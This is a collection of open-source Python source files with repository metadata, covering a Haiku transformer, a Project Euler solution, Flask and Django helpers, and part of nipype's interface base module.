class CausalSelfAttention(hk.MultiHeadAttention):
"""Self attention with a causal mask applied."""
def __call__(
self,
query: jnp.ndarray,
key: Optional[jnp.ndarray] = None,
value: Optional[jnp.ndarray] = None,
mask: Optional[jnp.ndarray] = None,
) -> jnp.ndarray:
key = key if key is not None else query
value = value if value is not None else query
if query.ndim != 3:
raise ValueError('Expect queries of shape [B, T, D].')
seq_len = query.shape[1]
causal_mask = np.tril(np.ones((seq_len, seq_len)))
mask = mask * causal_mask if mask is not None else causal_mask
return super().__call__(query, key, value, mask)
class DenseBlock(hk.Module):
"""A 2-layer MLP which widens then narrows the input."""
def __init__(self,
init_scale: float,
widening_factor: int = 4,
name: Optional[str] = None):
super().__init__(name=name)
self._init_scale = init_scale
self._widening_factor = widening_factor
def __call__(self, x: jnp.ndarray) -> jnp.ndarray:
hiddens = x.shape[-1]
initializer = hk.initializers.VarianceScaling(self._init_scale)
x = hk.Linear(self._widening_factor * hiddens, w_init=initializer)(x)
x = jax.nn.gelu(x)
return hk.Linear(hiddens, w_init=initializer)(x)
class Transformer(hk.Module):
"""A transformer stack."""
def __init__(self,
num_heads: int,
num_layers: int,
dropout_rate: float,
name: Optional[str] = None):
super().__init__(name=name)
self._num_layers = num_layers
self._num_heads = num_heads
self._dropout_rate = dropout_rate
def __call__(self,
h: jnp.ndarray,
mask: Optional[jnp.ndarray],
is_training: bool) -> jnp.ndarray:
"""Connects the transformer.
Args:
h: Inputs, [B, T, D].
mask: Padding mask, [B, T].
is_training: Whether we're training or not.
Returns:
Array of shape [B, T, D].
"""
init_scale = 2. / self._num_layers
dropout_rate = self._dropout_rate if is_training else 0.
if mask is not None:
mask = mask[:, None, None, :]
# Note: names chosen to approximately match those used in the GPT-2 code;
# see https://github.com/openai/gpt-2/blob/master/src/model.py.
for i in range(self._num_layers):
h_norm = layer_norm(h, name=f'h{i}_ln_1')
h_attn = CausalSelfAttention(
num_heads=self._num_heads,
key_size=32,
model_size=h.shape[-1],
w_init_scale=init_scale,
name=f'h{i}_attn')(h_norm, mask=mask)
h_attn = hk.dropout(hk.next_rng_key(), dropout_rate, h_attn)
h = h + h_attn
h_norm = layer_norm(h, name=f'h{i}_ln_2')
h_dense = DenseBlock(init_scale, name=f'h{i}_mlp')(h_norm)
h_dense = hk.dropout(hk.next_rng_key(), dropout_rate, h_dense)
h = h + h_dense
h = layer_norm(h, name='ln_f')
return h
def layer_norm(x: jnp.ndarray, name: Optional[str] = None) -> jnp.ndarray:
"""Apply a unique LayerNorm to x with default settings."""
return hk.LayerNorm(axis=-1,
create_scale=True,
create_offset=True,
name=name)(x)
| deepmind/dm-haiku | examples/transformer/model.py | Python | apache-2.0 | 4,120 |
"""Problem 45 of https://projecteuler.net"""
from projecteuler.generators import triangle_numbers
from projecteuler.inspectors import is_pentagonal, is_hexagonal
def problem_45():
"""Solution to problem 45."""
count = 0
triangle_generator = triangle_numbers()
while True:
number = next(triangle_generator)
if not is_hexagonal(number):
continue
if not is_pentagonal(number):
continue
count += 1
if count == 3:
return number
| hjheath/ProjectEuler | projecteuler/problems/problem_45.py | Python | mit | 518 |
__version__ = '0.7.0'
| ceholden/yatsm | yatsm/version.py | Python | mit | 22 |
import os
from flask import session
from everyclass.server.utils.web_consts import SESSION_CURRENT_USER, SESSION_USER_SEQ
def plugin_available(plugin_name: str) -> bool:
"""
check if a plugin (Sentry, apm, logstash) is available in the current environment.
:return True if available else False
"""
from everyclass.server.utils.config import get_config
config = get_config()
mode = os.environ.get("MODE", None)
if mode:
return mode.lower() in getattr(config, "{}_AVAILABLE_IN".format(plugin_name).upper())
else:
raise EnvironmentError("MODE not in environment variables")
UTYPE_USER = "user"
UTYPE_GUEST = "guest"
def get_ut_uid():
"""已登录用户获得学号,未登录用户获得user序列ID"""
if SESSION_CURRENT_USER in session:
return UTYPE_USER, session[SESSION_CURRENT_USER].identifier
if SESSION_USER_SEQ in session:
return UTYPE_GUEST, session[SESSION_USER_SEQ]
raise NotImplementedError("user seq not exist in session")
def get_logged_in_uid():
"""获得当前已登录的用户ID,如果未登录返回None"""
ut, uid = get_ut_uid()
if ut == UTYPE_GUEST:
return None
else:
return uid
| fr0der1c/EveryClass-server | everyclass/server/utils/common_helpers.py | Python | mpl-2.0 | 1,226 |
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login
from rest_framework.serializers import (
ModelSerializer,
HyperlinkedIdentityField,
SerializerMethodField,
)
from photos.models import *
class UserSerializer(ModelSerializer):
class Meta:
model = User
fields = [
'id',
'username',
'password',
'email',
'first_name',
'last_name',
]
extra_kwargs = {'password': {'write_only': True}}
def create(self, validated_data):
user = User(
username=validated_data.get('username'),
email=validated_data.get('email'),
)
user.set_password(validated_data.get('password'))
user.save()
return user
class FolderSerializer(ModelSerializer):
photos = SerializerMethodField()
class Meta:
model = Folder
fields = [
'id',
'name',
'user',
'photos',
'date_created',
'date_modified',
]
extra_kwargs = {'date_created': {'read_only': True},
'date_modified': {'read_only': True}}
def get_photos(self, obj):
serialized_photos = []
photos = obj.photo_set.all()
for photo in photos:
serializer = PhotoSerializer(photo)
serialized_photos.append(serializer.data)
return serialized_photos
class PhotoSerializer(ModelSerializer):
folder_name = SerializerMethodField()
uploader = SerializerMethodField()
class Meta:
model = Photo
fields = [
'id',
'image',
'title',
'edited_image',
'folder_name',
'share_code',
'effects',
'uploader',
'file_size',
'user',
'date_created',
'date_modified',
]
extra_kwargs = {'date_created': {'read_only': True},
'date_modified': {'read_only': True}}
def get_folder_name(self, obj):
try:
return obj.folder.name
except:
return 'None'
def get_uploader(self, obj):
return obj.user.username | andela-snwuguru/photo-editing | app/photos/api/serializers.py | Python | gpl-3.0 | 2,287 |
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Keras' Distribution Strategy library."""
# pylint: disable=unused-import
from tensorflow.python.keras.distribute import sidecar_evaluator
| tensorflow/tensorflow | tensorflow/python/keras/distribute/__init__.py | Python | apache-2.0 | 831 |
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
Package contains interfaces for using existing functionality in other packages
Exaples FSL, matlab/SPM , afni
Requires Packages to be installed
"""
from ConfigParser import NoOptionError
from copy import deepcopy
from cPickle import dumps
import datetime
import errno
import json
import os
import re
import platform
import pwd
from socket import getfqdn
from string import Template
import select
import subprocess
import sys
from textwrap import wrap
from datetime import datetime as dt
from dateutil.parser import parse as parseutc
from warnings import warn
from uuid import uuid1
from distutils.version import LooseVersion
try:
import prov.model as pm
except ImportError:
from ..external import provcopy as pm
from .traits_extension import (traits, Undefined, TraitDictObject,
TraitListObject, TraitError,
isdefined, File, Directory,
has_metadata)
from ..utils.filemanip import (md5, hash_infile, FileNotFoundError,
hash_timestamp, save_json,
split_filename)
from ..utils.misc import is_container, trim, str2bool
from .. import config, logging
from .. import __version__
nipype_version = LooseVersion(__version__)
from .. import get_info
iflogger = logging.getLogger('interface')
__docformat__ = 'restructuredtext'
def load_template(name):
"""Load a template from the script_templates directory
Parameters
----------
name : str
The name of the file to load
Returns
-------
template : string.Template
"""
full_fname = os.path.join(os.path.dirname(__file__),
'script_templates', name)
template_file = open(full_fname)
template = Template(template_file.read())
template_file.close()
return template
class Bunch(object):
"""Dictionary-like class that provides attribute-style access to it's items.
A `Bunch` is a simple container that stores it's items as class
attributes. Internally all items are stored in a dictionary and
the class exposes several of the dictionary methods.
Examples
--------
>>> from nipype.interfaces.base import Bunch
>>> inputs = Bunch(infile='subj.nii', fwhm=6.0, register_to_mean=True)
>>> inputs
Bunch(fwhm=6.0, infile='subj.nii', register_to_mean=True)
>>> inputs.register_to_mean = False
>>> inputs
Bunch(fwhm=6.0, infile='subj.nii', register_to_mean=False)
Notes
-----
The Bunch pattern came from the Python Cookbook:
.. [1] A. Martelli, D. Hudgeon, "Collecting a Bunch of Named
Items", Python Cookbook, 2nd Ed, Chapter 4.18, 2005.
"""
def __init__(self, *args, **kwargs):
self.__dict__.update(*args, **kwargs)
def update(self, *args, **kwargs):
"""update existing attribute, or create new attribute
Note: update is very much like HasTraits.set"""
self.__dict__.update(*args, **kwargs)
def items(self):
"""iterates over bunch attributes as key, value pairs"""
return self.__dict__.items()
def iteritems(self):
"""iterates over bunch attributes as key, value pairs"""
warn('iteritems is deprecated, use items instead')
return self.items()
def get(self, *args):
'''Support dictionary get() functionality
'''
return self.__dict__.get(*args)
def set(self, **kwargs):
'''Support dictionary get() functionality
'''
return self.__dict__.update(**kwargs)
def dictcopy(self):
"""returns a deep copy of existing Bunch as a dictionary"""
return deepcopy(self.__dict__)
def __repr__(self):
"""representation of the sorted Bunch as a string
Currently, this string representation of the `inputs` Bunch of
interfaces is hashed to determine if the process' dirty-bit
needs setting or not. Till that mechanism changes, only alter
this after careful consideration.
"""
outstr = ['Bunch(']
first = True
for k, v in sorted(self.items()):
if not first:
outstr.append(', ')
outstr.append('%s=%r' % (k, v))
first = False
outstr.append(')')
return ''.join(outstr)
def _hash_infile(self, adict, key):
# Inject file hashes into adict[key]
stuff = adict[key]
if not is_container(stuff):
stuff = [stuff]
file_list = []
for afile in stuff:
if os.path.isfile(afile):
md5obj = md5()
fp = file(afile, 'rb')
while True:
data = fp.read(8192)
if not data:
break
md5obj.update(data)
fp.close()
md5hex = md5obj.hexdigest()
else:
md5hex = None
file_list.append((afile, md5hex))
return file_list
def _get_bunch_hash(self):
"""Return a dictionary of our items with hashes for each file.
Searches through dictionary items and if an item is a file, it
calculates the md5 hash of the file contents and stores the
file name and hash value as the new key value.
However, the overall bunch hash is calculated only on the hash
value of a file. The path and name of the file are not used in
the overall hash calculation.
Returns
-------
dict_withhash : dict
Copy of our dictionary with the new file hashes included
with each file.
hashvalue : str
The md5 hash value of the `dict_withhash`
"""
infile_list = []
for key, val in self.items():
if is_container(val):
# XXX - SG this probably doesn't catch numpy arrays
# containing embedded file names either.
if isinstance(val, dict):
# XXX - SG should traverse dicts, but ignoring for now
item = None
else:
if len(val) == 0:
raise AttributeError('%s attribute is empty' % key)
item = val[0]
else:
item = val
try:
if os.path.isfile(item):
infile_list.append(key)
except TypeError:
# `item` is not a file or string.
continue
dict_withhash = self.dictcopy()
dict_nofilename = self.dictcopy()
for item in infile_list:
dict_withhash[item] = self._hash_infile(dict_withhash, item)
dict_nofilename[item] = [val[1] for val in dict_withhash[item]]
# Sort the items of the dictionary, before hashing the string
# representation so we get a predictable order of the
# dictionary.
sorted_dict = str(sorted(dict_nofilename.items()))
return (dict_withhash, md5(sorted_dict).hexdigest())
def __pretty__(self, p, cycle):
'''Support for the pretty module
pretty is included in ipython.externals for ipython > 0.10'''
if cycle:
p.text('Bunch(...)')
else:
p.begin_group(6, 'Bunch(')
first = True
for k, v in sorted(self.items()):
if not first:
p.text(',')
p.breakable()
p.text(k + '=')
p.pretty(v)
first = False
p.end_group(6, ')')
class InterfaceResult(object):
"""Object that contains the results of running a particular Interface.
Attributes
----------
version : version of this Interface result object (a readonly property)
interface : class type
A copy of the `Interface` class that was run to generate this result.
inputs : a traits free representation of the inputs
outputs : Bunch
An `Interface` specific Bunch that contains all possible files
that are generated by the interface. The `outputs` are used
as the `inputs` to another node when interfaces are used in
the pipeline.
runtime : Bunch
Contains attributes that describe the runtime environment when
the `Interface` was run. Contains the attributes:
* cmdline : The command line string that was executed
* cwd : The directory the ``cmdline`` was executed in.
* stdout : The output of running the ``cmdline``.
* stderr : Any error messages output from running ``cmdline``.
* returncode : The code returned from running the ``cmdline``.
"""
def __init__(self, interface, runtime, inputs=None, outputs=None,
provenance=None):
self._version = 2.0
self.interface = interface
self.runtime = runtime
self.inputs = inputs
self.outputs = outputs
self.provenance = provenance
@property
def version(self):
return self._version
class BaseTraitedSpec(traits.HasTraits):
"""Provide a few methods necessary to support nipype interface api
The inputs attribute of interfaces call certain methods that are not
available in traits.HasTraits. These are provided here.
new metadata:
* usedefault : set this to True if the default value of the trait should be
used. Unless this is set, the attributes are set to traits.Undefined
new attribute:
* get_hashval : returns a tuple containing the state of the trait as a dict
and hashvalue corresponding to dict.
XXX Reconsider this in the long run, but it seems like the best
solution to move forward on the refactoring.
"""
def __init__(self, **kwargs):
""" Initialize handlers and inputs"""
# NOTE: In python 2.6, object.__init__ no longer accepts input
# arguments. HasTraits does not define an __init__ and
# therefore these args were being ignored.
#super(TraitedSpec, self).__init__(*args, **kwargs)
super(BaseTraitedSpec, self).__init__(**kwargs)
traits.push_exception_handler(reraise_exceptions=True)
undefined_traits = {}
for trait in self.copyable_trait_names():
if not self.traits()[trait].usedefault:
undefined_traits[trait] = Undefined
self.trait_set(trait_change_notify=False, **undefined_traits)
self._generate_handlers()
self.set(**kwargs)
def items(self):
""" Name, trait generator for user modifiable traits
"""
for name in sorted(self.copyable_trait_names()):
yield name, self.traits()[name]
def __repr__(self):
""" Return a well-formatted representation of the traits """
outstr = []
for name, value in sorted(self.trait_get().items()):
outstr.append('%s = %s' % (name, value))
return '\n' + '\n'.join(outstr) + '\n'
def _generate_handlers(self):
"""Find all traits with the 'xor' metadata and attach an event
handler to them.
"""
has_xor = dict(xor=lambda t: t is not None)
xors = self.trait_names(**has_xor)
for elem in xors:
self.on_trait_change(self._xor_warn, elem)
has_requires = dict(requires=lambda t: t is not None)
requires = self.trait_names(**has_requires)
for elem in requires:
self.on_trait_change(self._requires_warn, elem)
has_deprecation = dict(deprecated=lambda t: t is not None)
deprecated = self.trait_names(**has_deprecation)
for elem in deprecated:
self.on_trait_change(self._deprecated_warn, elem)
def _xor_warn(self, obj, name, old, new):
""" Generates warnings for xor traits
"""
if isdefined(new):
trait_spec = self.traits()[name]
# for each xor, set to default_value
for trait_name in trait_spec.xor:
if trait_name == name:
# skip ourself
continue
if isdefined(getattr(self, trait_name)):
self.trait_set(trait_change_notify=False,
**{'%s' % name: Undefined})
msg = ('Input "%s" is mutually exclusive with input "%s", '
'which is already set') % (name, trait_name)
raise IOError(msg)
def _requires_warn(self, obj, name, old, new):
"""Part of the xor behavior
"""
if isdefined(new):
trait_spec = self.traits()[name]
msg = None
for trait_name in trait_spec.requires:
if not isdefined(getattr(self, trait_name)):
if not msg:
msg = 'Input %s requires inputs: %s' \
% (name, ', '.join(trait_spec.requires))
if msg:
warn(msg)
def _deprecated_warn(self, obj, name, old, new):
"""Checks if a user assigns a value to a deprecated trait
"""
if isdefined(new):
trait_spec = self.traits()[name]
msg1 = ('Input %s in interface %s is deprecated.' %
(name,
self.__class__.__name__.split('InputSpec')[0]))
msg2 = ('Will be removed or raise an error as of release %s'
% trait_spec.deprecated)
if trait_spec.new_name:
if trait_spec.new_name not in self.copyable_trait_names():
raise TraitError(msg1 + ' Replacement trait %s not found' %
trait_spec.new_name)
msg3 = 'It has been replaced by %s.' % trait_spec.new_name
else:
msg3 = ''
msg = ' '.join((msg1, msg2, msg3))
if LooseVersion(str(trait_spec.deprecated)) < nipype_version:
raise TraitError(msg)
else:
warn(msg)
if trait_spec.new_name:
warn('Unsetting %s and setting %s.' % (name,
trait_spec.new_name))
self.trait_set(trait_change_notify=False,
**{'%s' % name: Undefined,
'%s' % trait_spec.new_name: new})
def _hash_infile(self, adict, key):
""" Inject file hashes into adict[key]"""
stuff = adict[key]
if not is_container(stuff):
stuff = [stuff]
file_list = []
for afile in stuff:
if is_container(afile):
hashlist = self._hash_infile({'infiles': afile}, 'infiles')
hash = [val[1] for val in hashlist]
else:
if config.get('execution',
'hash_method').lower() == 'timestamp':
hash = hash_timestamp(afile)
elif config.get('execution',
'hash_method').lower() == 'content':
hash = hash_infile(afile)
else:
raise Exception("Unknown hash method: %s" %
config.get('execution', 'hash_method'))
file_list.append((afile, hash))
return file_list
def get(self, **kwargs):
""" Returns traited class as a dict
Augments the trait get function to return a dictionary without
notification handles
"""
out = super(BaseTraitedSpec, self).get(**kwargs)
out = self._clean_container(out, Undefined)
return out
def get_traitsfree(self, **kwargs):
""" Returns traited class as a dict
Augments the trait get function to return a dictionary without
any traits. The dictionary does not contain any attributes that
were Undefined
"""
out = super(BaseTraitedSpec, self).get(**kwargs)
out = self._clean_container(out, skipundefined=True)
return out
def _clean_container(self, object, undefinedval=None, skipundefined=False):
"""Convert a traited obejct into a pure python representation.
"""
if isinstance(object, TraitDictObject) or isinstance(object, dict):
out = {}
for key, val in object.items():
if isdefined(val):
out[key] = self._clean_container(val, undefinedval)
else:
if not skipundefined:
out[key] = undefinedval
elif (isinstance(object, TraitListObject) or isinstance(object, list)
or isinstance(object, tuple)):
out = []
for val in object:
if isdefined(val):
out.append(self._clean_container(val, undefinedval))
else:
if not skipundefined:
out.append(undefinedval)
else:
out.append(None)
if isinstance(object, tuple):
out = tuple(out)
else:
if isdefined(object):
out = object
else:
if not skipundefined:
out = undefinedval
return out
def get_hashval(self, hash_method=None):
"""Return a dictionary of our items with hashes for each file.
Searches through dictionary items and if an item is a file, it
calculates the md5 hash of the file contents and stores the
file name and hash value as the new key value.
However, the overall bunch hash is calculated only on the hash
value of a file. The path and name of the file are not used in
the overall hash calculation.
Returns
-------
dict_withhash : dict
Copy of our dictionary with the new file hashes included
with each file.
hashvalue : str
The md5 hash value of the traited spec
"""
dict_withhash = {}
dict_nofilename = {}
for name, val in sorted(self.get().items()):
if isdefined(val):
trait = self.trait(name)
if has_metadata(trait.trait_type, "nohash", True):
continue
hash_files = (not has_metadata(trait.trait_type, "hash_files",
False)
and not has_metadata(trait.trait_type,
"name_source"))
dict_nofilename[name] = \
self._get_sorteddict(val, hash_method=hash_method,
hash_files=hash_files)
dict_withhash[name] = \
self._get_sorteddict(val, True, hash_method=hash_method,
hash_files=hash_files)
return (dict_withhash, md5(str(dict_nofilename)).hexdigest())
def _get_sorteddict(self, object, dictwithhash=False, hash_method=None,
hash_files=True):
if isinstance(object, dict):
out = {}
for key, val in sorted(object.items()):
if isdefined(val):
out[key] = \
self._get_sorteddict(val, dictwithhash,
hash_method=hash_method,
hash_files=hash_files)
elif isinstance(object, (list, tuple)):
out = []
for val in object:
if isdefined(val):
out.append(self._get_sorteddict(val, dictwithhash,
hash_method=hash_method,
hash_files=hash_files))
if isinstance(object, tuple):
out = tuple(out)
else:
if isdefined(object):
if (hash_files and isinstance(object, str) and
os.path.isfile(object)):
if hash_method is None:
hash_method = config.get('execution', 'hash_method')
if hash_method.lower() == 'timestamp':
hash = hash_timestamp(object)
elif hash_method.lower() == 'content':
hash = hash_infile(object)
else:
raise Exception("Unknown hash method: %s" % hash_method)
if dictwithhash:
out = (object, hash)
else:
out = hash
elif isinstance(object, float):
out = '%.10f' % object
else:
out = object
return out
class DynamicTraitedSpec(BaseTraitedSpec):
""" A subclass to handle dynamic traits
This class is a workaround for add_traits and clone_traits not
functioning well together.
"""
def __deepcopy__(self, memo):
""" bug in deepcopy for HasTraits results in weird cloning behavior for
added traits
"""
id_self = id(self)
if id_self in memo:
return memo[id_self]
dup_dict = deepcopy(self.get(), memo)
# access all keys
for key in self.copyable_trait_names():
_ = getattr(self, key)
# clone once
dup = self.clone_traits(memo=memo)
for key in self.copyable_trait_names():
try:
_ = getattr(dup, key)
except:
pass
# clone twice
dup = self.clone_traits(memo=memo)
dup.set(**dup_dict)
return dup
class TraitedSpec(BaseTraitedSpec):
""" Create a subclass with strict traits.
This is used in 90% of the cases.
"""
_ = traits.Disallow
class Interface(object):
"""This is an abstract definition for Interface objects.
It provides no functionality. It defines the necessary attributes
and methods all Interface objects should have.
"""
input_spec = None # A traited input specification
output_spec = None # A traited output specification
_can_resume = False # defines if the interface can reuse partial results
# after interruption
@property
def can_resume(self):
return self._can_resume
_always_run = False # should the interface be always run even if the
# inputs were not changed?
@property
def always_run(self):
return self._always_run
def __init__(self, **inputs):
"""Initialize command with given args and inputs."""
raise NotImplementedError
@classmethod
def help(cls):
""" Prints class help"""
raise NotImplementedError
@classmethod
def _inputs_help(cls):
""" Prints inputs help"""
raise NotImplementedError
@classmethod
def _outputs_help(cls):
""" Prints outputs help"""
raise NotImplementedError
@classmethod
def _outputs(cls):
""" Initializes outputs"""
raise NotImplementedError
@property
def version(self):
raise NotImplementedError
def run(self):
"""Execute the command."""
raise NotImplementedError
def aggregate_outputs(self, runtime=None, needed_outputs=None):
"""Called to populate outputs"""
raise NotImplementedError
def _list_outputs(self):
""" List expected outputs"""
raise NotImplementedError
def _get_filecopy_info(self):
""" Provides information about file inputs to copy or link to cwd.
Necessary for pipeline operation
"""
raise NotImplementedError
def safe_encode(x):
"""Encodes a python value for prov
"""
nipype = pm.Namespace("nipype", "http://nipy.org/nipype/terms/")
if x is None:
return pm.Literal("Unknown", pm.XSD['string'])
if isinstance(x, (str, unicode)):
if os.path.exists(x):
try:
return pm.URIRef('file://%s%s' % (getfqdn(), x))
except AttributeError:
return pm.Literal('file://%s%s' % (getfqdn(), x),
pm.XSD['anyURI'])
else:
return pm.Literal(x, pm.XSD['string'])
if isinstance(x, (int,)):
return pm.Literal(int(x), pm.XSD['integer'])
if isinstance(x, (float,)):
return pm.Literal(x, pm.XSD['float'])
if isinstance(x, dict):
outdict = {}
for key, value in x.items():
encoded_value = safe_encode(value)
if isinstance(encoded_value, (pm.Literal,)):
outdict[key] = encoded_value.json_representation()
else:
outdict[key] = encoded_value
return pm.Literal(json.dumps(outdict), pm.XSD['string'])
if isinstance(x, list):
outlist = []
for value in x:
encoded_value = safe_encode(value)
if isinstance(encoded_value, (pm.Literal,)):
outlist.append(encoded_value.json_representation())
else:
outlist.append(encoded_value)
return pm.Literal(json.dumps(outlist), pm.XSD['string'])
try:
return pm.Literal(dumps(x), nipype['pickle'])
except TypeError, e:
iflogger.info(e)
return pm.Literal("Could not encode", pm.XSD['string'])
class BaseInterfaceInputSpec(TraitedSpec):
ignore_exception = traits.Bool(False, desc="Print an error message instead \
of throwing an exception in case the interface fails to run", usedefault=True,
nohash=True)
class BaseInterface(Interface):
"""Implements common interface functionality.
Implements
----------
* Initializes inputs/outputs from input_spec/output_spec
* Provides help based on input_spec and output_spec
* Checks for mandatory inputs before running an interface
* Runs an interface and returns results
* Determines which inputs should be copied or linked to cwd
This class does not implement aggregate_outputs, input_spec or
output_spec. These should be defined by derived classes.
This class cannot be instantiated.
"""
input_spec = BaseInterfaceInputSpec
_version = None
def __init__(self, **inputs):
if not self.input_spec:
raise Exception('No input_spec in class: %s' %
self.__class__.__name__)
self.inputs = self.input_spec(**inputs)
@classmethod
def help(cls, returnhelp=False):
""" Prints class help
"""
if cls.__doc__:
#docstring = cls.__doc__.split('\n')
#docstring = [trim(line, '') for line in docstring]
docstring = trim(cls.__doc__).split('\n') + ['']
else:
docstring = ['']
allhelp = '\n'.join(docstring + cls._inputs_help() + [''] +
cls._outputs_help() + [''])
if returnhelp:
return allhelp
else:
print(allhelp)
@classmethod
def _get_trait_desc(self, inputs, name, spec):
desc = spec.desc
xor = spec.xor
requires = spec.requires
manhelpstr = ['\t%s' % name]
try:
setattr(inputs, name, None)
except TraitError as excp:
def_val = ''
if getattr(spec, 'usedefault'):
def_arg = getattr(spec, 'default_value')()[1]
def_val = ', nipype default value: %s' % str(def_arg)
line = "(%s%s)" % (excp.info, def_val)
manhelpstr = wrap(line, 70,
initial_indent=manhelpstr[0]+': ',
subsequent_indent='\t\t ')
if desc:
for line in desc.split('\n'):
line = re.sub("\s+", " ", line)
manhelpstr += wrap(line, 70,
initial_indent='\t\t',
subsequent_indent='\t\t')
if xor:
line = '%s' % ', '.join(xor)
manhelpstr += wrap(line, 70,
initial_indent='\t\tmutually_exclusive: ',
subsequent_indent='\t\t ')
if requires:
others = [field for field in requires if field != name]
line = '%s' % ', '.join(others)
manhelpstr += wrap(line, 70,
initial_indent='\t\trequires: ',
subsequent_indent='\t\t ')
return manhelpstr
@classmethod
def _inputs_help(cls):
""" Prints description for input parameters
"""
helpstr = ['Inputs::']
inputs = cls.input_spec()
if len(inputs.traits(transient=None).items()) == 0:
helpstr += ['', '\tNone']
return helpstr
manhelpstr = ['', '\t[Mandatory]']
for name, spec in sorted(inputs.traits(mandatory=True).items()):
manhelpstr += cls._get_trait_desc(inputs, name, spec)
opthelpstr = ['', '\t[Optional]']
for name, spec in sorted(inputs.traits(mandatory=None,
transient=None).items()):
opthelpstr += cls._get_trait_desc(inputs, name, spec)
if manhelpstr:
helpstr += manhelpstr
if opthelpstr:
helpstr += opthelpstr
return helpstr
@classmethod
def _outputs_help(cls):
""" Prints description for output parameters
"""
helpstr = ['Outputs::', '']
if cls.output_spec:
outputs = cls.output_spec()
for name, spec in sorted(outputs.traits(transient=None).items()):
helpstr += cls._get_trait_desc(outputs, name, spec)
if len(helpstr) == 2:
helpstr += ['\tNone']
return helpstr
def _outputs(self):
""" Returns a bunch containing output fields for the class
"""
outputs = None
if self.output_spec:
outputs = self.output_spec()
return outputs
@classmethod
def _get_filecopy_info(cls):
""" Provides information about file inputs to copy or link to cwd.
Necessary for pipeline operation
"""
info = []
if cls.input_spec is None:
return info
metadata = dict(copyfile=lambda t: t is not None)
for name, spec in sorted(cls.input_spec().traits(**metadata).items()):
info.append(dict(key=name,
copy=spec.copyfile))
return info
def _check_requires(self, spec, name, value):
""" check if required inputs are satisfied
"""
if spec.requires:
values = [not isdefined(getattr(self.inputs, field))
for field in spec.requires]
if any(values) and isdefined(value):
msg = ("%s requires a value for input '%s' because one of %s "
"is set. For a list of required inputs, see %s.help()" %
(self.__class__.__name__, name,
', '.join(spec.requires), self.__class__.__name__))
raise ValueError(msg)
def _check_xor(self, spec, name, value):
""" check if mutually exclusive inputs are satisfied
"""
if spec.xor:
values = [isdefined(getattr(self.inputs, field))
for field in spec.xor]
if not any(values) and not isdefined(value):
msg = ("%s requires a value for one of the inputs '%s'. "
"For a list of required inputs, see %s.help()" %
(self.__class__.__name__, ', '.join(spec.xor),
self.__class__.__name__))
raise ValueError(msg)
def _check_mandatory_inputs(self):
""" Raises an exception if a mandatory input is Undefined
"""
for name, spec in self.inputs.traits(mandatory=True).items():
value = getattr(self.inputs, name)
self._check_xor(spec, name, value)
if not isdefined(value) and spec.xor is None:
msg = ("%s requires a value for input '%s'. "
"For a list of required inputs, see %s.help()" %
(self.__class__.__name__, name, self.__class__.__name__))
raise ValueError(msg)
if isdefined(value):
self._check_requires(spec, name, value)
for name, spec in self.inputs.traits(mandatory=None,
transient=None).items():
self._check_requires(spec, name, getattr(self.inputs, name))
def _check_version_requirements(self, trait_object, raise_exception=True):
""" Raises an exception on version mismatch
"""
unavailable_traits = []
version = LooseVersion(str(self.version))
if not version:
return
# check minimum version
check = dict(min_ver=lambda t: t is not None)
names = trait_object.trait_names(**check)
for name in names:
min_ver = LooseVersion(str(trait_object.traits()[name].min_ver))
if min_ver > version:
unavailable_traits.append(name)
if not isdefined(getattr(trait_object, name)):
continue
if raise_exception:
raise Exception('Trait %s (%s) (version %s < required %s)' %
(name, self.__class__.__name__,
version, min_ver))
check = dict(max_ver=lambda t: t is not None)
names = trait_object.trait_names(**check)
for name in names:
max_ver = LooseVersion(str(trait_object.traits()[name].max_ver))
if max_ver < version:
unavailable_traits.append(name)
if not isdefined(getattr(trait_object, name)):
continue
if raise_exception:
raise Exception('Trait %s (%s) (version %s > required %s)' %
(name, self.__class__.__name__,
version, max_ver))
return unavailable_traits
def _run_interface(self, runtime):
""" Core function that executes interface
"""
raise NotImplementedError
def run(self, **inputs):
"""Execute this interface.
This interface will not raise an exception if runtime.returncode is
non-zero.
Parameters
----------
inputs : allows the interface settings to be updated
Returns
-------
results : an InterfaceResult object containing a copy of the instance
that was executed, provenance information and, if successful, results
"""
self.inputs.set(**inputs)
self._check_mandatory_inputs()
self._check_version_requirements(self.inputs)
interface = self.__class__
# initialize provenance tracking
env = deepcopy(os.environ.data)
runtime = Bunch(cwd=os.getcwd(),
returncode=None,
duration=None,
environ=env,
startTime=dt.isoformat(dt.utcnow()),
endTime=None,
platform=platform.platform(),
hostname=getfqdn(),
version=self.version)
try:
runtime = self._run_interface(runtime)
outputs = self.aggregate_outputs(runtime)
runtime.endTime = dt.isoformat(dt.utcnow())
timediff = parseutc(runtime.endTime) - parseutc(runtime.startTime)
runtime.duration = timediff.days * 86400 + timediff.seconds + \
timediff.microseconds/100000.
results = InterfaceResult(interface, runtime,
inputs=self.inputs.get_traitsfree(),
outputs=outputs)
prov_record = self.write_provenance(results)
results.provenance = prov_record
except Exception, e:
runtime.endTime = dt.isoformat(dt.utcnow())
timediff = parseutc(runtime.endTime) - parseutc(runtime.startTime)
runtime.duration = timediff.days * 86400 + timediff.seconds + \
timediff.microseconds/100000.
if len(e.args) == 0:
e.args = ("")
message = "\nInterface %s failed to run." % self.__class__.__name__
if config.has_option('logging', 'interface_level') and \
config.get('logging', 'interface_level').lower() == 'debug':
inputs_str = "Inputs:" + str(self.inputs) + "\n"
else:
inputs_str = ''
if len(e.args) == 1 and isinstance(e.args[0], str):
e.args = (e.args[0] + " ".join([message, inputs_str]),)
else:
e.args += (message, )
if inputs_str != '':
e.args += (inputs_str, )
#exception raising inhibition for special cases
import traceback
runtime.traceback = traceback.format_exc()
runtime.traceback_args = e.args
inputs = None
try:
inputs = self.inputs.get_traitsfree()
except Exception, e:
pass
results = InterfaceResult(interface, runtime, inputs=inputs)
try:
prov_record = self.write_provenance(results)
except Exception:
prov_record = None
results.provenance = prov_record
if hasattr(self.inputs, 'ignore_exception') and \
isdefined(self.inputs.ignore_exception) and \
